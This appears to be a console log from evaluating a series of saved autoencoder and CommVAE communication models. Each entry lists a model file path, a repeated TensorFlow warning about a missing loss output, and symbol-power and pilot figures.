AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0033026 Model: 4.0033026 1.8361068213913785 1.1874696750731897 Pilots : [1.00041274 1.00041274]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321064540.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.005479 Model: 4.005479 1.8138575984179783 1.2174414010683823 Pilots : [1.00068462 1.00068462]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321065004.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.02326 Model: 4.02326 1.8552669530261519 1.1688675298412703 Pilots : [1.0029033 1.0029033]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321065427.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.001155 Model: 4.001155 1.8526649333797203 1.1657128988048429 Pilots : [1.00014435 1.00014435]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321065851.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.996416 Model: 3.996416 1.7956279596636346 1.2394755969041482 Pilots : [0.99955191 0.99955191]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321070309.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.007162 Model: 4.007162 1.8448767246111506 1.1773408339552747 Pilots : [1.00089486 1.00089486]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321070735.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.047037 Model: 4.047037 1.8524358755599124 1.1793720245220862 Pilots : [1.00586246 1.00586246]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321071200.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.00617 Model: 4.00617 1.86976866985588 1.145918142954617 Pilots : [1.00077093 1.00077093]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321071623.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025215 Model: 4.025215 1.8924489590227345 1.1239338426942236 Pilots : [1.00314694 1.00314694]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321072036.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0125704 Model: 4.0125704 1.8154856709021998 1.2174104128446532 Pilots : [1.00157007 1.00157007]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321072447.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.026843 Model: 4.026843 1.8259696021541327 1.2077515916242507 Pilots : [1.00334977 1.00334977]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321072904.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0389285 Model: 4.0389285 1.8800514723427248 1.14268542184117 Pilots : [1.00485428 1.00485428]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321073321.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.002658 Model: 4.002658 1.85456791909066 1.1637588224214421 Pilots : [1.00033218 1.00033218]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321073736.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0165157 Model: 4.0165157 1.8336104700082971 1.1946352136165732 Pilots : [1.00206234 1.00206234]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321074148.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0000906 Model: 4.0000906 1.8085962348287208 1.2228877177454474 Pilots : [1.00001132 1.00001132]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321074607.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.041437 Model: 4.041437 1.8470325019139568 1.1846409848093262 Pilots : [1.0051663 1.0051663]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321075017.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.026678 Model: 4.026678 1.7934384399359313 1.251912463321814 Pilots : [1.00332922 1.00332922]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321075439.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0006523 Model: 4.0006523 1.8196845249845954 1.2081993730928187 Pilots : [1.00008154 1.00008154]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321075859.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.025361 Model: 4.025361 1.846886871141046 1.1801147894049215 Pilots : [1.00316512 1.00316512]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321080315.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0253434 Model: 4.0253434 1.8612192197476485 1.1620046888336588 Pilots : [1.00316293 1.00316293]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321080732.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0063267 Model: 4.0063267 1.8556321009606167 1.1634898661824455 Pilots : [1.00079052 1.00079052]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321081147.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.018792 Model: 4.018792 1.8218698420233155 1.2107677700046606 Pilots : [1.00234627 1.00234627]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321081605.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0246162 Model: 4.0246162 1.88529731823307 1.1323085220771865 Pilots : [1.00307231 1.00307231]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321082020.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.022691 Model: 4.022691 1.8217843780395888 1.2120560454309162 Pilots : [1.00283234 1.00283234]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321082435.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0239677 Model: 4.0239677 1.8197517896509243 1.2151508088998775 Pilots : [1.00299149 1.00299149]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321082851.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0190573 Model: 4.0190573 1.8115719968041795 1.2246528504031482 Pilots : [1.00237933 1.00237933]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321083314.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0126243 Model: 4.0126243 1.8268143446593972 1.2023742549693606 Pilots : [1.00157679 1.00157679]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321083732.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0166383 Model: 4.0166383 1.843216213607343 1.182252276272981 Pilots : [1.00207763 1.00207763]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321084207.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.030143 Model: 4.030143 1.8041835990776798 1.238109260546918 Pilots : [1.00376078 1.00376078]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321084629.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0024295 Model: 4.0024295 1.8914140454700872 1.1187948788791258 Pilots : [1.00030364 1.00030364]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321085050.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0235624 Model: 4.0235624 1.7948200256726217 1.2490186735454212 Pilots : [1.00294098 1.00294098]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321085515.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0094414 Model: 4.0094414 1.814767576641543 1.2174239606145685 Pilots : [1.00117948 1.00117948]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321085938.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.022017 Model: 4.022017 1.8468679088641413 1.1791586249790467 Pilots : [1.00274835 1.00274835]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321090355.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.01322 Model: 4.01322 1.8752937719396838 1.141180461339508 Pilots : [1.00165112 1.00165112]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321090819.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.993683 Model: 3.993683 1.775520453766357 1.2668413812140367 Pilots : [0.99921008 0.99921008]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321091229.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 3.99748 Model: 3.99748 1.8340267272725506 1.1884337308234605 Pilots : [0.99968494 0.99968494]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321091641.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.0085154 Model: 4.0085154 1.8457842606389663 1.176580578040224 Pilots : [1.00106385 1.00106385]\n./models_04x02/rbf_oshea_64_32_16_10dB_20190321092101.dil AEOshea\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 4.007532 Model: 4.007532 1.8876442247433065 1.1247000760156827 Pilots : [1.00094107 1.00094107]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316230025.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1858146 Model: 1.1858146 1.0718046452286907 1.0322515180735543 Pilots : [0.54447558 0.54447558]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316230501.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1638489 Model: 1.1638489 1.0978789855732851 0.9655786336935741 Pilots : [0.53940914 0.53940914]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316230929.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1584036 Model: 1.1584036 1.0811247782473081 0.9910789900138589 Pilots : [0.53814581 0.53814581]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316231417.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1611385 Model: 1.1611385 1.0674488155697848 1.0190369198235298 Pilots : [0.53878069 0.53878069]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316231911.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1837598 Model: 1.1837598 1.073667008470956 1.0268910620912428 Pilots : [0.54400363 0.54400363]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316232347.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1674697 Model: 1.1674697 1.0789229644634366 1.0029164592984576 Pilots : [0.54024757 0.54024757]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316232814.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1458226 Model: 1.1458226 1.069209186547585 1.0022868620453316 Pilots : [0.53521553 0.53521553]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316233315.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1572412 Model: 1.1572412 1.0433416579299928 1.0630918787645056 Pilots : [0.53787574 0.53787574]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316233803.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.167278 Model: 1.167278 1.0839504041717625 0.9934716904895743 Pilots : [0.54020321 0.54020321]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316234234.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1428549 Model: 1.1428549 1.0749188559618392 0.989098955411168 Pilots : [0.53452197 0.53452197]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316234659.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1570493 Model: 1.1570493 1.083332387456133 0.9858898810811678 Pilots : [0.53783113 0.53783113]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316235205.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1702943 Model: 1.1702943 1.0789232272203517 1.0053423987464105 Pilots : [0.5409007 0.5409007]\n./models_04x02/rbf_awgn_64_32_16_n040_20190316235652.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.196095 Model: 1.196095 1.0616730645885306 1.0611678235322488 Pilots : [0.54683064 0.54683064]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317000124.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1517587 Model: 1.1517587 1.0564357462926233 1.0319895858394734 Pilots : [0.5366001 0.5366001]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317000559.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1863053 Model: 1.1863053 1.1007440722417905 0.9790925686829618 Pilots : [0.54458821 0.54458821]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317001105.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1781274 Model: 1.1781274 1.0460425152352857 1.076697208171678 Pilots : [0.54270789 0.54270789]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317001549.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1502329 Model: 1.1502329 1.071896448588126 1.001106141559045 Pilots : [0.53624456 0.53624456]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317002021.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1360887 Model: 1.1360887 1.0797701591225497 0.9744276733380797 Pilots : [0.53293732 0.53293732]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317002459.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1835482 Model: 1.1835482 1.0716773185865165 1.0305234415906992 Pilots : [0.54395501 0.54395501]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317003001.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1665043 Model: 1.1665043 1.0745964764821783 1.0101724177779579 Pilots : [0.54002413 0.54002413]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317003439.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1798611 Model: 1.1798611 1.0820058982651755 1.0077936433931676 Pilots : [0.54310705 0.54310705]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317003907.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1716278 Model: 1.1716278 1.0827005439215756 0.9994773189533803 Pilots : [0.54120878 0.54120878]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317004355.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1636987 Model: 1.1636987 1.0717776351677886 1.013050647464568 Pilots : [0.53937433 0.53937433]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317004857.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1649482 Model: 1.1649482 1.062008601385914 1.032881635115647 Pilots : [0.53966384 0.53966384]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317005327.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1575803 Model: 1.1575803 1.0623430762049362 1.0257027677828066 Pilots : [0.53795452 0.53795452]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317005759.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1654664 Model: 1.1654664 1.077509201792652 1.003824503111421 Pilots : [0.53978385 0.53978385]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317010249.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1760485 Model: 1.1760485 1.0786472719312516 1.0108025756010932 Pilots : [0.54222885 0.54222885]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317010738.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1656138 Model: 1.1656138 1.0522411641836467 1.0527471983367611 Pilots : [0.53981797 0.53981797]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317011202.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1637664 Model: 1.1637664 1.087940204137969 0.9832314373294148 Pilots : [0.53939002 0.53939002]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317011641.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1535736 Model: 1.1535736 1.0911738125658226 0.9688520249439585 Pilots : [0.53702273 0.53702273]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317012148.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1667856 Model: 1.1667856 1.077582677015827 1.004823671306762 Pilots : [0.54008925 0.54008925]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317012620.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1600156 Model: 1.1600156 1.0701507847342575 1.01291703434125 Pilots : [0.5385201 0.5385201]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317013058.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1575218 Model: 1.1575218 1.0940208313743855 0.9671147620235342 Pilots : [0.53794095 0.53794095]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317013539.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1387819 Model: 1.1387819 1.0725505839825102 0.989931150120344 Pilots : [0.53356862 0.53356862]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317014046.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.208365 Model: 1.208365 1.112429952160681 0.9764562217766724 Pilots : [0.54962828 0.54962828]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317014517.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1683422 Model: 1.1683422 1.0293989468516016 1.1025610253608285 Pilots : [0.5404494 0.5404494]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317014945.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1812631 Model: 1.1812631 1.0805905700788174 1.0116360268325995 Pilots : [0.54342964 0.54342964]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317015431.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1623462 Model: 1.1623462 1.070130281069905 1.0149910434237934 Pilots : [0.53906081 0.53906081]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317015931.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1604922 Model: 1.1604922 1.0751248539345022 1.003978507036364 Pilots : [0.53863071 0.53863071]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317020355.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1849031 Model: 1.1849031 1.07592471678848 1.0235736167061906 Pilots : [0.54426628 0.54426628]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317020821.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1586131 Model: 1.1586131 1.0649516727341353 1.0215946953487183 Pilots : [0.53819446 0.53819446]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317021320.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1682594 Model: 1.1682594 1.0716246558787879 1.017311333786681 Pilots : [0.54043024 0.54043024]\n./models_04x02/rbf_awgn_64_32_16_n040_20190317021720.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 1.1596835 Model: 1.1596835 1.061561436420331 1.0290801436070736 Pilots : [0.538443 